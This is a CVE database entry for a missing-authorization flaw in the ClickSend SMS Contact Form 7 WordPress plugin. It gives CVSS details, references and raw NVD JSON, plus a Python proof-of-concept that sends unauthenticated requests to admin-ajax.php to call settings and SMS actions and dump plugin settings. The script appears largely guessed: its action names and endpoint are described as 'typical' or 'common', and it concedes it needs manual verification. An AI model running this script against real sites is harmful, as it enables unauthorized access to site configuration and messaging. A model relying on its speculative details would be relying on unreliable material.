CVE-2025-62915

Description

Missing Authorization vulnerability in clicksend SMS Contact Form 7 Notifications by ClickSend clicksend-contactform7 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SMS Contact Form 7 Notifications by ClickSend: from n/a through <= 1.4.0.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

clicksend-contactform7 <= 1.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62915 PoC - ClickSend Contact Form 7 Missing Authorization
# This PoC demonstrates the access control vulnerability in clicksend-contactform7 plugin

import requests
import sys

# Configuration
TARGET_URL = "http://target-wordpress-site.com"
# The vulnerable endpoint - typically an AJAX action or REST API route
VULNERABLE_ENDPOINT = f"{TARGET_URL}/wp-admin/admin-ajax.php"

def check_vulnerability():
    """Check if the target is vulnerable to CVE-2025-62915"""
    
    # Method 1: Try to access admin functionality without authentication
    print("[*] Testing unauthenticated access to admin functions...")
    
    # Common vulnerable AJAX actions in this plugin
    vulnerable_actions = [
        "clicksend_get_settings",
        "clicksend_save_settings",
        "clicksend_test_sms",
        "clicksend_send_sms"
    ]
    
    for action in vulnerable_actions:
        payload = {
            "action": action,
            "nonce": ""  # May not be required due to missing authorization
        }
        
        try:
            response = requests.post(VULNERABLE_ENDPOINT, data=payload, timeout=10)
            
            # Check for successful access without proper authorization
            if response.status_code == 200:
                # Look for indicators of successful unauthorized access
                if "success" in response.text.lower() or "settings" in response.text.lower():
                    print(f"[+] VULNERABLE: Action '{action}' accessible without proper authorization")
                    print(f"[+] Response snippet: {response.text[:200]}...")
                    return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing action {action}: {e}")
    
    # Method 2: Test with low-privileged user credentials
    print("\n[*] Testing access with low-privileged user...")
    
    # If you have low-privilege credentials
    low_priv_session = requests.Session()
    # low_priv_session.post(f"{TARGET_URL}/wp-login.php", data={
    #     "log": "low_priv_user",
    #     "pwd": "password"
    # })
    
    print("[*] Exploit requires manual verification based on specific plugin version")
    print("[*] Please refer to Patchstack advisory for detailed exploitation steps")
    
    return False

def exploit_settings_access():
    """Attempt to extract or modify plugin settings"""
    
    print("\n[*] Attempting to retrieve plugin settings...")
    
    # This would attempt to access the settings without proper authorization
    exploit_data = {
        "action": "clicksend_get_settings",
        "request_type": "get_config"
    }
    
    try:
        response = requests.post(VULNERABLE_ENDPOINT, data=exploit_data, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Settings retrieved: {response.text}")
            return response.json() if response.headers.get('content-type', '').startswith('application/json') else response.text
    except Exception as e:
        print(f"[-] Error: {e}")
    
    return None

if __name__ == "__main__":
    print("CVE-2025-62915 - ClickSend Contact Form 7 Missing Authorization PoC")
    print("=" * 70)
    
    if check_vulnerability():
        print("\n[!] Target is VULNERABLE to CVE-2025-62915")
        print("[!] Recommendation: Update plugin to version > 1.4.0 immediately")
    else:
        print("\n[-] Target may not be vulnerable or requires further testing")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62915
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62915
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62915/
[4] VulDB https://vuldb.com/cve/CVE-2025-62915
[5] https://patchstack.com/database/Wordpress/Plugin/clicksend-contactform7/vulnerability/wordpress-sms-contact-form-7-notifications-by-clicksend-plugin-1-4-0-broken-access-control-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62915", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:50.940", "lastModified": "2026-04-27T18:16:30.253", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in clicksend SMS Contact Form 7 Notifications by ClickSend clicksend-contactform7 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SMS Contact Form 7 Notifications by ClickSend: from n/a through <= 1.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/clicksend-contactform7/vulnerability/wordpress-sms-contact-form-7-notifications-by-clicksend-plugin-1-4-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}